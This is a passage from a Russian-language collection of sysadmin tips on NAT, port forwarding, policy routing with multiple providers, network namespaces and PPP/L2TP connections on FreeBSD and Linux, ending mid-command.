Необходимо выпустить пользователей на ftp сайты из локальной сети, но при этом не устанавливая дополнительного ПО, используя только возможности FreeBSD 4.10. Этими возможностями, как ни странно, оказались ipfw и natd вот собственно как все это прописывается. Исходные данные, FreeBSD 4.10 + настроенный nat правила для ipfw ipfw -q add 100 divert natd from 192.168.20.0/24 to any 20, 21 out via $oif ipfw -q add 200 divert natd from any 20, 21 to $iip in via $oif ipfw -q add 300 allow tcp from any to any established ipfw -q add 400 allow tcp from any to any setup где $oif и $iip соответственно внешний интерфейс и внешний IP теперь запускаем natd /sbin/natd -m -s -u -punch_fw 500:200 -n xl1 заострю внимание на параметре "-punch_fw" -этот параметр создает в фаерволе "ходы", добавляя динамические правила. В моем случае эти правила начнутся с номера 500 и будет их добавлено максимум 200 (понятно чем больше сеть, те больше нужно правил). Особое спасибо A Clockwork Orange.

Как в FreeBSD перебросить соединение через NAT во внутреннюю сеть (доп. ссылка 1) Автор: spanka [комментарии]

Вот реализация для ipfw: if1IP="ип_смотрящий_в_инет", if1="интерфейс_смотрящий_в_инет" ifLIP="ип_на_который хотим делать редирект" ipfw add divert natd tcp from any to ${if1IP} 80 via ${if1} ipfw add divert natd ip from any to ${ifLIP} to any via ${if1} ipfw add allow tcp from any to ${if1IP} 80 via any natd -n ${if1} -redirect_port tcp ${ifLIP}:80 80 Решение от miaso <torov@wipline.ru>: tproxy -s 80 -r nobody -l /var/log/transparent_proxy.log [int_ip] 80

Как в Linux перебросить соединение через NAT во внутреннюю сеть (доп. ссылка 1) Автор: Dimez [комментарии]

Первый путь - пробрасывание только порта: 1) iptables -t nat -A PREROUTING -p tcp -d EXT_R_IP --dport 10000 -j DNAT --to-destination LOCAL_IP:80 2) iptables -A FORWARD -i eth0 -d LOCAL_IP -p tcp --dport 22 -j ACCEPT Второй вариант - выброс всей машины наружу (если есть свободные адреса): 1) ifconfig eth0:0 NEW_IP netmask NETMASK broadcast BROADCAST 2) route add NEW_IP gw GW netmask 0.0.0.0 metric 1 dev eth0:0 3) iptables -t nat -A PREROUTING -p tcp -d NEW_IP -j DNAT --to-destination LOCAL_IP 4) iptables -A FORWARD -i eth0 -d LOCAL_IP -j ACCEPT Обозначения: EXT_R_IP - внешний IP роутера, LOCAL_IP - внутренний IP машины, которую хочешь выбросить NEW_IP - новый IP на который хочешь посадить машину, которая имеет локальный LOCAL_IP NETMASK, BROADCAST, GW - внешние netmask, broadcast и gateway

Пример настройки NAT с привязкой к IP под Linux [комментарии]

Пример настройки NAT с привязкой к IP под Linux iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -d 0/0 -o eth0 -j SNAT --to-source 212.23.98.45 или (без привязки к IP) ipchains -A forward -j MASQ -s 192.168.0.0/16 -d 0.0.0.0/0 или (через iproute2) ip rule add from 10.0.1.0/24 nat 254.147.38.14 Другой способ трансляции адресов: iptables -t nat -A POSTROUTING -s 192.168.0.0/24 -d 0/0 -j MASQUERADE

Как организовать редирект порта на внутреннюю машину через ipnat в FreeBSD. [комментарии]

man 5 ipnat в /etc/ipnat.conf: rdr fxp0 205.15.63.3/32 port 80 -> 192.168.1.1 port 80 tcp # Базансировка нагрузки между 2 IP: rdr le0 203.1.2.3/32 port 80 -> 203.1.2.3,203.1.2.4 port 80 tcp round-robin

Как настроить NAT (транслятор адресов) для нормальной работы с FTP и ICQ в Linux [комментарии]

iptables: modprobe iptable_nat modprobe ip_conntrack_ftp modprobe ip_nat_ftp modprobe ip_nat_irc ipchains: modprobe ip_masq_ftp modprobe ip_masq_raudio modprobe ip_masq_irc modprobe ip_masq_icq

Как обеспечить работу active FTP режима в FreeBSD NAT [обсудить]

В ipnat воспользуйтесь модулем ftp proxy: map fxp0 0/0 -> 0/32 proxy port ftp ftp/tcp map rl0 172.16.33.0/24 -> 212.46.231.50/32 proxy port ftp ftp/tcp не забудьте поместить правило трансляции ftp перед общим правилом трансляции, порядок следования правил важен.

Как запустить трансляцию адресов (NAT) под FreeBSD [комментарии]

В /etc/rc.conf: ipnat_enable="YES" В /etc/ipnat.rules: Трансляция адресов (NAT): map ppp0 172.16.1.0/24 -> 194.46.124.53/32 где, ppp0 - внешний интерфейс, 172.16.1.0/24 - внутренние IP, 194.46.124.53 - реальный IP внешнего интерфейса. Переброс порта во внутреннюю сеть: rdr ed0 294.16.9.6/32 port 8080 -> 192.168.0.7 port 8080 tcp где, ed0 - внешний интерфейс, 294.16.9.6 - реальный IP внешнего интерфейса, на который нужно обращаться из вне. 192.168.0.7 - внутренний IP на который делается переброс. 8080 - номер перебрасываемого порта. Перечитать: ipnat -CF -f /etc/ipnat.rules

Policy routing

Использование нескольких сетевых стеков в Linux Автор: Roman Timofeev ( ^rage^ ) [комментарии]

В linux относительно давно появилась такая замечательная вещь, как неймспейсы (namespaces). Основное применение данной технологии - контейнерная виртуализация, но и на маршрутизаторе можно придумать много разных применений, так как среди неймспейсов есть "network namespaces". Network namespaces позволяют в рамках одной машины в каждом неймспейсе иметь:
свой набор таблиц маршрутизации (а их 2^31-1 шт)
свою arp-таблицу
свои правила iptables
свои устройства (а значит и qdisc + class'ы tc) NB: для выполнения нижеследующих примеров крайне желательно иметь свежий iproute2 и ядро. Создаются неймспейсы достаточно скучно и просто: ip netns add VROUTER ip netns add KUKYSEVRACI Создадим "виртуальны шнурок": ip link add name ve0a type veth peer name ve0b Добавим интерфейсы внутрь VROUTER: ip link set dev eth0 netns VROUTER ip link set dev ve0b netns VROUTER Выполнить команду в контексте определённого неймспейса можно так: ip netns exec VROUTER ip link show Настроим адреса: ip netns exec VROUTER ip a a 192.168.1.1/24 dev ve0b ip a a 192.168.1.2/24 dev ve0a ip netns exec VROUTER ip a a 10.140.48.16/24 dev eth0 Поднимем интерфейсы: ip link set dev ve0a up ip netns exec VROUTER ip link set dev eth0 up ip netns exec VROUTER ip link set dev ve0b up Шлюз по умолчанию: ip netns exec VROUTER ip r a default via 10.140.48.1 Посмотрим, что получилось: root@laptus:~# ip netns exec VROUTER ip r s default via 10.140.48.1 dev eth0 10.140.48.0/24 dev eth0 proto kernel scope link src 10.140.48.16 192.168.1.0/24 dev ve0b proto kernel scope link src 192.168.1.1 Добавим NAT: ip netns exec VROUTER iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to-source 10.140.48.16 Сделаем пару трейсов: root@laptus:~# ip netns exec VROUTER traceroute -q 1 -I opennet.ru traceroute to opennet.ru (77.234.201.242), 30 hops max, 60 byte packets 1 10.140.48.1 (10.140.48.1) 0.148 ms 2 10.140.0.1 (10.140.0.1) 0.245 ms 3 border.yournet.ru (91.204.148.17) 0.436 ms 4 alisa.yournet.ru (91.204.151.2) 0.521 ms 5 sev-gw.yournet.ru (91.204.148.2) 8.975 ms 6 bl16-1-gw.spb.runnet.ru (194.190.255.25) 1.321 ms 7 bl16-1-gw.spb.runnet.ru (194.85.40.170) 1.785 ms 8 s14-1-gw.spb.runnet.ru (194.85.40.81) 1.456 ms 9 vuztc.spb.runnet.ru (194.190.255.170) 1.987 ms 10 opennet.ru (77.234.201.242) 2.395 ms root@laptus:~# traceroute -q 1 -I opennet.ru traceroute to opennet.ru (77.234.201.242), 30 hops max, 60 byte packets 1 192.168.1.1 (192.168.1.1) 0.094 ms 2 10.140.48.1 (10.140.48.1) 0.751 ms 3 10.140.0.1 (10.140.0.1) 1.277 ms 4 border.yournet.ru (91.204.148.17) 2.061 ms 5 alisa.yournet.ru (91.204.151.2) 2.911 ms 6 sev-gw.yournet.ru (91.204.148.2) 6.770 ms 7 bl16-1-gw.spb.runnet.ru (194.190.255.25) 3.622 ms 8 bl16-1-gw.spb.runnet.ru (194.85.40.170) 5.262 ms 9 s14-1-gw.spb.runnet.ru (194.85.40.81) 4.135 ms 10 vuztc.spb.runnet.ru (194.190.255.170) 4.710 ms 11 opennet.ru (77.234.201.242) 7.220 ms

Перенаправление всего трафика через один шлюз в Fedora/Red Hat Linux Автор: shadow_alone [комментарии]

При необходимости направить весь трафик с машины через шлюз, даже запросы к локальной сети, используем следующую конфигурацию сети (пример для Red Hat-совместимых дистрибутивов) /etc/sysconfig/network-scripts/ifcfg-eth0 DEVICE=eth0 BOOTPROTO=static BROADCAST=192.168.0.255 IPADDR=192.168.0.100 NETMASK=255.255.255.255 SCOPE="peer 192.168.0.1" ONBOOT=yes /etc/sysconfig/network-scripts/route-eth0 ADDRESS0=0.0.0.0 NETMASK0=0.0.0.0 GATEWAY0=192.168.0.1 Теперь весь трафик от текущей машины будет ходить через шлюз 192.168.0.1, так как маска у нас /32.

Тонкости настройки Linux при подключении к двум и более провайдерам Автор: Pavel V. Rochnyack [комментарии]

Подключение к интернет через нескольких провайдеров давно уже не редкость. Раньше рассматриваемая тема называлась "линукс и два провайдера", но в суровой реальности провайдеров может быть и больше. Также хочется вместо термина "провайдер" использовать "канал", поскольку некоторые люди путаются - "провайдер у меня один", а вот шлюзов (и адресов в различных подсетях) он предоставляет несколько (ну, так бывает нужно по разным мотивам). Написано на эту тему также уже довольно много. Но есть что дополнить, поэтому приступим. Вводная часть. Итак, первое что требуется сделать для указания правил маршрутизации - это указать, к чему эти правила будут приводить. А приводить они должны к тому, что пакеты пойдут по разным шлюзам, такчто, вполне логично описать эти самые шлюзы. Делается это с использованием набора пользовательских таблиц маршрутизации. Для удобства использования, им можно присваивать admin-friendly имена, что делается прописыванием строк в файл /etc/iproute2/rt_tables. Строки имеют вид примерно такой: 100 northtelecom 101 southtelecom Таблицы можно не именовать, а использовать во всех подкомандах команды ip безликие цифры, в этом случае ничего в файл rt_tables прописывать не потребуется. Также, часть документации таблицы именует именами вида "Т1", "Т2" что тоже, на мой взгляд, слабо удобно при просмотре правил. Отлично, таблицы поименованы. Далее требуется указать шлюзы, на которые требуется отправлять трафик. Обычно для этого прописывается пара команд в системный файл-скрипт, который отвечает за "подъем" маршрутизатора. На PC-маршрутизаторе вполне можно для этих целей использовать непосредственно /etc/rc.local. Итак, команды указания маршрутов в интернет выглядят так: ip route add default via northtelecom_gw table northtelecom ip route add default via southtelecom_gw table southtelecom Отлично! Мы создали две таблицы маршрутизации, внесли в них значения двух шлюзов для маршрутизации трафика. Теперь эти таблицы надо начать применять. Обдуманное применение таблиц маршрутизации заключается в использовании команды "ip rule" и выглядит это примерно так: ip rule add from northtelecom_ip lookup northtelecom ip rule add from southtelecom_ip lookup southtelecom На самом деле, это еще не совсем обдуманное применение, поскольку не указаны приоритеты правил (забегая вперед, уточним что они указываются использованием "ip rule add .... pref <priority>"). Посмотрим на получившийся результат: debian:~# ip ru 0: from all lookup local 32764: from southtelecom_ip lookup southtelecom 32765: from northtelecom_ip lookup northtelecom 32766: from all lookup main 32767: from all lookup default Что означает полученный вывод ? Он означает, что пакет при выборе пути к месту назначения будет сначала проверен правилом 0, который отправит поиск маршрута в таблицу "local". Просмотр таблицы "local" проводится на предмет "не является ли получателем" локальная машина, широковещательный или сетевой адреса интерфейсов маршрутизатора. Соответствующими маршрутами заполняют эту таблицу команды конфигурации сетевых интерфейсов. Далее, пакет будет проверен нашими двумя правилами 32764 и 32765, на предмет адреса отправителя, и, в случае совпадения, будет отправлен в соответствующую таблицу маршрутизации. Если адрес отправителя не совпадет с southtelecom_ip или northtelecom_ip, поиск маршрута пойдет с использованием таблицы "main", а таблица "default" (пока еще?) дистрибутивно чиста. Как вы могли заметить, если маршрут не будет найден в таблице, на которую поиск будет завернут правилом, то поиски-проверки будут продолжены со следующего правила. Таблица "main" - это основная таблица, используемая по-умолчанию всеми командами-программами, связанными с маршрутизацией. При поднятии интерфейсов в неё прописываются маршруты к подсетям интерфейсов, стартовые скрипты также заносят в эту таблицу значение шлюза по-умолчанию. Использование команды "route add" администратором также может дополнить таблицу машрутами. В общем случае, таблица "main" всегда содержит подходящий для пакета маршрут (например шлюз по-умолчанию). Закончим вводную часть и приступим к "первому сложному моменту". Некоторые источники рекомендуют использовать еще и примерно такие команды при описании таблиц провайдеров: ip route add northtelecom_net dev northtelecom_if src northtelecom_ip table northtelecom ip route add southtelecom_net dev southtelecom_if src southtelecom_ip table southtelecom Во-первых, хочется заметить что можно упростить команду, опустив уточнение "src northtelecom_ip", поскольку таблица будет выбираться путем сравнения IP-адреса отправителя пакета с некоторым значением, т.е. адрес уже будет задан. А во-вторых, объясню более подробно, зачем нужны соответствующие маршруты. Без дополнительной команды таблица northtelecom содержит следующие маршруты (да, пока, только один маршрут): debian:~# ip ro sh table northtelecom default via northtelecom_gw dev northtelecom_if В этом случае, пакетик, который отправляется с адреса northtelecom_ip к одному из хостов в сети провайдера northtelecom будет послан не непосредственно к этому хосту, а отправлен на машрутизатор провайдера. Конечно же, лучше отправлять пакет непосредственно к хосту, для чего требуется соответствующее уточнение таблиц маршрутизации командами ip route add northtelecom_net dev northtelecom_if table northtelecom ip route add southtelecom_net dev southtelecom_if table southtelecom Вроде бы всё здорово, пакеты в непосредственно присоединенные сети провайдеров идут напрямую к хостам. Но неужели у нас отсутствует локальная сеть ? Чаще всего она у нас есть. Но что же произойдет, если из локальной сети будет произведено обращение к одному из адресов northtelecom_ip или southtelecom_ip ? Посмотрим еще раз на вывод команды "ip rule" debian:~# ip ru 0: from all lookup local 32764: from southtelecom_ip lookup southtelecom 32765: from northtelecom_ip lookup northtelecom 32766: from all lookup main 32767: from all lookup default В соответствии с правилами, маршрут отправки пакетов, исходящих с адресов northtelecom_ip или southtelecom_ip, будет производиться в таблицах northtelecom и southtelecom, что в конечном счете приведет к отправке пакета в сторону шлюза провайдера. Поскольку это слегка не то, что нам нужно, придется дополнить таблицы еще парочкой маршрутов. ip route add local_net dev local_if table northtelecom ip route add local_net dev local_if table southtelecom А если у нас есть еще и внутренние маршрутизаторы, и подсетки, скрытые за ними, то всё аналогично, требуется добавление каждой подсетки в каждую таблицу провайдеров. ip route add local_net2 via local_router2 table northtelecom ip route add local_net3 via local_router2 table northtelecom ip route add local_net2 via local_router2 table southtelecom ip route add local_net3 via local_router2 table southtelecom Много правил, много команд, легко запутаться, потерять, забыть что-то прописать ... Неужели нельзя проще ? Как показывает практика, можно, но не всегда. Легкий трюк, который в большинстве случаев помогает, выглядит так: ip rule add lookup main pref 1000 ip ro add default via (northtelecom|southtelecom)_gw table default ip ro delete default table main Что он означает? Посмотрим на таблицу правил командой "ip rule" (да, я уже перенабрал набор правил с указанием приоритетов) debian:~# ip ru 0: from all lookup local 1000: from all lookup main 3000: from southtelecom_ip lookup southtelecom 3010: from northtelecom_ip lookup northtelecom 32766: from all lookup main 32767: from all lookup default Теперь для исходящих пакетов до поиска маршрутов в таблицах провайдеров будет осуществлен поиск маршрута в таблице "main", а она, как было написано выше, содержит максимум информации о маршрутах, в том числе и маршруты в локальные сети, как присоединенные напрямую, так и через внутренние маршрутизаторы. Чтобы поиск маршрута в таблице "main" не закончился отправкой пакета в "шлюз по умолчанию", мы перенесем его указание в таблицу "default". Всё, теперь локальные и присоединенные сети вносить в таблицы "southtelecom" и "northtelecom" необходимости нет. Достаточно эти таблицы сформировать командами ip route add default via northtelecom_gw table northtelecom ip route add default via southtelecom_gw table southtelecom и получить работоспособность. Но этот легкий трюк имеет некоторый побочный эффект, который иногда ограничивает его прямое применение. Допустим, что от хоста из сети southtelecom_net идет обращение к northtelecom_ip. Поскольку теперь маршрут приоритетно ищется в таблице main, то ответные пакеты с адреса northtelecom_ip будут отправлены через интерфейс southtelecom_if непосредственно к обратившемуся хосту. C одной стороны, это можеть быть здорово, пакеты пойдут кратчайшим путем, мы можем ожидать более высокой скорости передачи ответа и массы других полезных вещей, но с другой стороны это может оказаться не тем, чего от нас ожидал наш провайдер southtelecom, который ограничил нас на нашем порту коммутатора парой MAC+IP... В общем, вышеописаный трюк - это трюк для слегка ленивых. Оптимальным методом решения задачи является создание третьей пользовательской таблицы "localnets" и указание в ней части маршрутов (маршрутов к локальным сетям) из таблицы main. В этой конфигурации, ответ при обращении из сети southtelecom_net к адресу northtelecom_ip пойдет точно также, как если бы второй канал в сеть southtelecom_net на маршрутизаторе отсутствовал, т.е. через сеть провайдера northtelecom, а не напрямую к хосту. Приведу набор команд, формирующих решение, а анализ того, как будет определяться маршрут для пакетов оставлю пытливым умам читателей. ip route add local_net dev local_if table localnets ip route add local_net2 via local_router2 table localnets ip route add local_net3 via local_router2 table localnets ip route add southtelecom_net dev southtelecom_if table southtelecom ip route add default via southtelecom_gw table southtelecom ip route add northtelecom_net dev northtelecom_if table northtelecom ip route add default via northtelecom_gw table northtelecom ip rule add lookup table localnets pref 1000 ip rule add from southtelecom_ip lookup southtelecom pref 3000 ip rule add from northtelecom_ip lookup northtelecom pref 3010 debian:~# ip ru 0: from all lookup local 1000: from all lookup localnets 3000: from southtelecom_ip lookup southtelecom 3010: from northtelecom_ip lookup northtelecom 32766: from all lookup main 32767: from all lookup default В качестве завершения, хочется отметить то, для чего между правилом 1000 и правилами 30хх оставлен свободный диапазон. Используя этот диапазон, очень удобно разделять, по какому из каналов пойдет трафик хостов локальной сети (без специальных правил он пойдет с использованием шлюза по умолчанию, заданного в таблице "main" или "default") или специально маркированный трафик. Например, это делается так: ip ru add from 192.168.0.100 lookup southtelecom pref 2000 ip ru add from 192.168.0.128/25 lookup northtelecom pref 2010 Названия провайдеров "southtelecom" и "northtelecom" являются вымышленными, совпадения, если таковые имеются, случайны.

Два провайдера и default gw в Linux Автор: Dmitriy Altuhov [комментарии]

Имеется сервер ASPLinux 10, с установленным postfix и 3-я сетевыми интерфейсами. Задача: корректная работа почты через один из интерфейсов, при этом в качестве default gw указан другой. Реализация: 1) в /etc/iproute2/rt_tables добавляем: 201 T1 202 T2 2) создаём скрипт и даём права на запуск, предварительно исправив нужные параметры IP - адреса сетевых интерфейсов P - адреса шлюзов #!/bin/sh IP1=192.168.4.1 IP2=217.1.1.2 P1=192.168.4.2 P2=217.1.1.1 ip route add default via $P1 table T1 ip route add default via $P2 table T2 ip route add default via $P1 ip rule add from $IP1 table T1 ip rule add from $IP2 table T2 В результате получим, что если пакет пришёл на P2, то он не пойдёт через default gw P1, а уйдёт через тот же интерфейс с IP1

Балансировка двух каналов средствами ipfw под FreeBSD Автор: Ivan Voytas [комментарии]

natd -p 8668 -a ip1 natd -p 8669 -a ip2 ipfw add divert 8668 ip from any to ip1 recv if1 ipfw add divert 8669 ip from any to ip2 recv if2 ipfw add check-state ipfw add prob 0.5 divert 8668 ip from 192.168.0.0/16 to any xmit if1 keep-state ipfw add divert 8669 ip from 192.168.0.0/16 to any xmit if1 keep-state ipfw add fwd gw1 ip from ip1 to any out xmit if1 (если default на if1) ipfw add fwd gw2 ip from ip2 to any out xmit if1

Проброс трафика через Linux машину используя Proxy ARP (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Пусть: x.x.x.96/28 - выделенная подсеть, которую нужно распределить по машинам в локальной сети. x.x.x.97 - IP внешнего шлюза. Требуется поставить между шлюзом и сетью фаервол, с одним адресом на двух интерфейсах x.x.x.98, транслируя ARP трафик используя "Proxy ARP". (x.x.x.99 ... x.x.x.110) --- (eth1, x.x.x.98 | eth0, x.x.x.98) --- (x.x.x.97) Удаляем маршруты созданные по умолчанию. ip route del x.x.x.96/28 dev eth0 ip route del x.x.x.96/28 dev eth1 Пакеты для x.x.x.97 пускаем через eth0, а для x.x.x.96/28 через eth1 ip route add x.x.x.97 dev eth0 ip route add x.x.x.96/28 dev eth1 Включаем Proxy ARP echo 1 > /proc/sys/net/ipv4/conf/eth0/proxy_arp echo 1 > /proc/sys/net/ipv4/conf/eth1/proxy_arp

Почему в FreeBSD 5.3 не работает форвадинг пакетов (ipfw fwd) (доп. ссылка 1) Автор: Bushi [комментарии]

Это ошибка в FreeBSD 5.3, патч здесь: http://www.freebsd.org/cgi/query-pr.cgi?pr=kern/71910

Пример настройки NAT для двух сетей в FreeBSD 5.3 (доп. ссылка 1) Автор: Vov [комментарии]

Стоит задача - выпустить свою сеть в инет через два разных интерфейса rl1 и rl2. Так как адреса в локали серые, то надо поднимать NAT. С учетом того, что динамической маршрутизации не предвидится, будем поднимать NAT на 2 интерфейса. Для этого нужно: Скомпилировать ядро с параметрами: options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=20 options IPFIREWALL_FORWARD options IPDIVERT options DUMMYNET options TCP_DROP_SYNFIN это необходимый минимум. На все случаи жизни ))))) Далее, в rc.local пишем такие строки: natd -p 8668 -n rl1 natd -p 8669 -n rl2 #natd -p 8671 -n rl3 #natd -p 8672 -n rl4 #natd -p 8673 -n rl5 Последние три строки - если кому надо поднимать NAT на большее количество интерфейсов. Следующее - правила ipfw: ipfw -f add divert 8668 all from #твоясеть# to any out via rl1 ipfw -f add divert 8668 all from any to #адрес_rl1# in via rl1 ipfw -f add divert 8669 all from #твоясеть# to any out via rl2 ipfw -f add divert 8669 all from any to #адрес_rl2# in via rl2 Теперь все, что будет выходить через внешние интерфейсы, будет правильно NATиться через них же. Остается проверить маршрутизацию. Если маска на rl2 /24. В этом случае все просто. Стандартный шлюз (default gateway) прописан через rl1, а все, что идет на сеть 999.888.0.0/24 будет автоматически бежать через rl2. Если же на rl2 выделена подсетка из нескольких адресов, то тогда надо писать жесткий марщрут на всю сеть 999.888.0.0/24 через rl2 на тот шлюз, который тебе дал провайдер N2. Его тоже можно прописать в rc.local отдельной строкой типа: route add 999.888.0.0/24 999.888.0.25 У Sergey2005 заработала комбинация: ${fwcmd} add 40 divert 8668 all from #моя сеть# to not #подсеть провайдера "S"# out via rl1 ${fwcmd} add 45 divert 8668 all from not #подсеть провайдера "S"# to any in via rl1 ${fwcmd} add 50 divert 8669 all from #моя сеть# to #подсеть провайдера "S"# out via rl2 ${fwcmd} add 55 divert 8669 all from #подсеть провайдера "S"# to any in via rl2 natd -p 8668 -m -u -n rl1 natd -p 8669 -m -u -n rl2

Пример разделения трафика для использования двух каналов в FreeBSD (доп. ссылка 1) Автор: ILJA [комментарии]

rl0 -> Первый ифайс во вне, rl1 -> Второй ифайс во вне rc.conf: defaultrouter="${rl1_gateway_ip}" rc.local: /sbin/natd -n rl0 -p 8660 /sbin/natd -n rl1 -p 8661 rc.firewall: ${fwcmd} add 1100 divert 8660 tcp from ${local_ip} to not ${rl0_ip} 22,25,53,80,110,6667 ${fwcmd} add 1110 fwd ${rl0_gateway_ip} tcp from ${rl0_ip} to not ${local_ip} ${fwcmd} add 1120 divert 8660 all from not ${rl0_ip},${local_ip} to ${rl0_ip} ${fwcmd} add 1150 pass all from any to ${rl0_ip} ${fwcmd} add 1150 pass all from ${rl0_ip} to any ${fwcmd} add 1999 divert 8661 all from ${local_ip} to not ${rl1_ip} ${fwcmd} add 2000 divert 8661 all from not ${rl1_ip},${local_ip} ${fwcmd} add 2010 pass all from any to ${local_ip} ${fwcmd} add 2010 pass all from ${local_ip} to any ${fwcmd} add 2100 pass all from any to ${rl1_ip} ${fwcmd} add 2100 pass all from ${rl1_ip} to any Правила тестировались на FreeBSD 4.7, 4.8, 4.9, 4.10, c ipfw2. Если у вас с ipfw(1) не работает, попробуйте убрать "not ${ip}" и вместо него вставить "any". "not" нужен для того чтобы локальные адреса не дивертировались, т.к. нам это не нужно. Порядковые номера могут быть на ваше усмотрение, рекомендую в начале разрешить трафик lo0, защититься от спуфа, запретить некоторые типы ICMP, разрешить внутренний трафик и т.д., и т.п.

Пример policy routing в Linux (маршрутизация в зависимости от IP источника) [обсудить]

ip rule add from 10.1.10.0/24 to 0/0 table 102 pref 100 ip route add table 102 via 10.1.10.1 ip rule add from 10.1.11.0/24 to 0/0 table 103 pref 100 ip route add table 103 via 10.1.11.45

Как организовать Policy Routing на FreeBSD [комментарии]

ipfw add 100 fwd 10.0.0.2 ip from 10.0.2.0/24 to any Если нужно использовать 2 шлюза, то можно воспользоваться: ipfw add fwd $ext_gw_ip ip from $ext_net to any out xmit $ext_int

Маршрутизация IP сервисов в DMZ через два провайдера Автор: Pavel V. Rochnyack [комментарии]

На форуме часто задается вопрос, по поводу маршрутизации сети, подключенной к двум провайдерам. В частном случае проблема расширяется тем, что нужно осуществлять проброс соединений к сервисам, расположенным в локальной сети. Это делается с помощью DNAT, и при этом снова возникает проблема - по каналу какого провайдера отправлять ответ. Проблема усугубляется тем, что обратное преобразование адресов выполняется уже после принятия решения о маршрутизации, т.е. примерно в районе цепочки POSTROUTING, но скрытно от пользователя. Решить эту нерешаемую проблему поможет модуль CONNMARK. Принцип работы маршрутизатора для решения описанной задачи будет выглядеть примерно так: Входящие соединения маркируются определенным флажком, после чего делается их проброс в нужное назначение. Каждый обратный пакет соединения _до принятия решения о маршрутизации_ маркируется флажком соответствующего ему соединения (флажок восстанавливается). На основании флажков принимается решение о маршрутизации пакета в соответствующую сеть. В нижеописанном примере обеспечение доступности сервиса по двум каналам/провайдерам делалось для локального сервиса маршрутизатора. В связи с этим маркировка исходящих пакетов делается в цепочке OUTPUT таблицы mangle. Для проброса порта к серверу в локальной сети (в DMZ) проверку и восстановление маркера надо делать в цепочке PREROUTING. Таким образом, "обратный DNAT" будет происходить когда пакет уже будет идти по нужному маршруту. Все не маркированные пакеты будут идти по маршруту по умолчанию. В моем случае это первый провайдер first и айпи интерфейса first_ip. Входящие пакеты/соединения с порта второго провайдера (destination <second_ip>) будут помечены маркером и к ним будет применен DNAT. Все исходящие (обратные) пакеты будут промаркированы значением маркера соединения в цепочке OUTPUT таблицы mangle. Более корректным вариантом, не зависящим от значения шлюза по умолчанию, является обязательная маркировка пакетов для соединений от любого провадера и создание соответствующих правил маршрутизации. [root@test z]# iptables -t nat -nvL PREROUTING Chain PREROUTING (policy ACCEPT 144M packets, 9659M bytes) pkts bytes target prot opt in out source destination 1 52 CONNMARK tcp -- * * 0.0.0.0/0 <second_ip> tcp dpt:<port> CONNMARK set 0x1 1 52 DNAT tcp -- * * 0.0.0.0/0 <second_ip> tcp dpt:<port> to:<first_ip>:<port> [root@test z]# iptables -t mangle -nvL OUTPUT Chain OUTPUT (policy ACCEPT 6745M packets, 7048G bytes) pkts bytes target prot opt in out source destination 65915 8600K CONNMARK tcp -- * * <first_ip> 0.0.0.0/0 tcp spt:<port> CONNMARK restore [root@test z]# ip ru sh 0: from all lookup local 1000: from all lookup main 3300: from all fwmark 0x1 lookup <second> 5000: from <first_ip> lookup <first> 5500: from <second_ip> lookup <second> 10000: from all lookup default 32766: from all lookup main 32767: from all lookup default

PPP, PPTP, PPPOE

Как поднять выделенное соединение по PPP. [комментарии]

Скрипт /etc/ppp.sh: #!/bin/sh while : ; do pppd cuaa0 115200 noipdefault noauth defaultroute nodetach done

Настройка устойчивого подключения к провайдеру Beeline (Corbina) в CentOS6/RHEL6 (доп. ссылка 1) Автор: Ilya [комментарии]

Настройка устойчивого подключения к провайдеру Internet Beeline (Corbina) в CentOS6 и RHEL6 по протоколу l2tp, с помощью openl2tp. Продолжение опуса - https://www.opennet.ru/tips/info/2539.shtml Многие идеи и скрипты были взяты из Debian(6). Для краткости изложения, привожу, только имена скриптов и конфигурационных файлов задействованных в процессе соединения и описание происходящих событий. Совет: если нет необходимости, или выбор дистрибутива не имеет значения, в Debian настройка выполняется проще и без установки дополнительных пакетов. Все необходимые пакеты (x86_64), скрипты, исходники можно найти по адресу http://www.ilyx.ru/openl2tp Дано: 1. Локальное подключения: ethernet 100Mb(eth0). 2. Login и Password для подключения к серверу tp.internet.beeline.ru. Необходимо: 1. Получить настройки по DHCP (локальный IP, маршруты, DNS сервера) через eth0. 2. Подключиться к Internet: с помощью openl2tp через сервер tp.internet.beeline.ru. Начнем с принципиальных трудностей и их устранения. Ядро (на данный момент 2.6.32-279.5.2.el6) собрано без заплатки для модуля "pppol2tp" - https://lkml.org/lkml/2011/5/5/416 - "Fix UDP socket reference count bugs in the pppol2tp driver", что не даст нам получить устойчивое соединение. В Debian(6) все нормально. Чтобы не пересобирать этот модуль для каждого нового ядра, я, воспользовавшись наработками http://elrepo.org, собрал пакет с пропатченным модулем. Устанавливаем "kmod-pppol2tp". "pppd" нас "радует" отсутствием необходимых плагинов openl2tp.so и pppol2tp.so из-за ошибок при сборке. Установим пакет - "openl2tp-ppp" - который является побочным продуктом при сборке openl2tp для RHEL6 после внесения необходимых изменений см. openl2tp-1.8-1.el6.src.rpm. Опять же, в Debian(6) все нормально. После этого устанавливаем сам openl2tp. Далее устанавливаем все необходимое из архива в /etc/* вносим необходимые изменения в файлы - /etc/sysconfig/network-scripts/ifcfg-* ; Если надо. /etc/openl2tpd.conf ; Меняем user_name= и dest_ipaddr= /etc/ppp/chap-secrets ; Меняем client, secret chkconfig openl2tpd on semodule -i pppol2tp.pp ; Если включен SELINUX. shutdown -r now Пояснение: Каталог /etc/dhcp - содержит конфигурационный файл dhclient.conf и скрипты для обработки параметров полученных по DHCP и не обрабатываемых по умолчанию утилитой dhclient. Результатом работы dhclient после поднятия eth0 должно быть: присвоение IP адреса (10.*.*.*) интерфейсу eth0, заполнение довольно внушительной, таблицы маршрутов к локальным сервисам Beeline, доступным без подключения к Internet, заполнение /etc/resolv.conf и установка временного маршрута по умолчанию. Также в файле /etc/dhcp-default-router сохраняется, IP адрес, полученного маршрута по умолчанию, для последующей настройке маршрутов при запуске и завершение openl2tpd(pppd). В файле /etc/openl2tpd.conf рекомендую в поле dest_ipaddr= указать IP адрес tp.internet.beeline.ru, а не tp.internet.beeline.ru, т.к. в случае если при разыменование произойдет сбой, openl2tpd завершится, без дальнейших попыток переустановить соединение. Можно выбрать понравившийся IP адрес, несколько раз запустив "ping -c 1 tp.internet.beeline.ru". Каталог /etc/ppp - содержит простейшие скрипты и необходимые настройки, спецефичные для RHEL6, для настройки таблицы маршрутов при поднятие "pppX" интерфейса используя файл /etc/dhcp-default-router. Если используем как маршрутизатор, добавляем где-нибудь в iptables: iptables -t mangle -A FORWARD -o pppX -p tcp -m 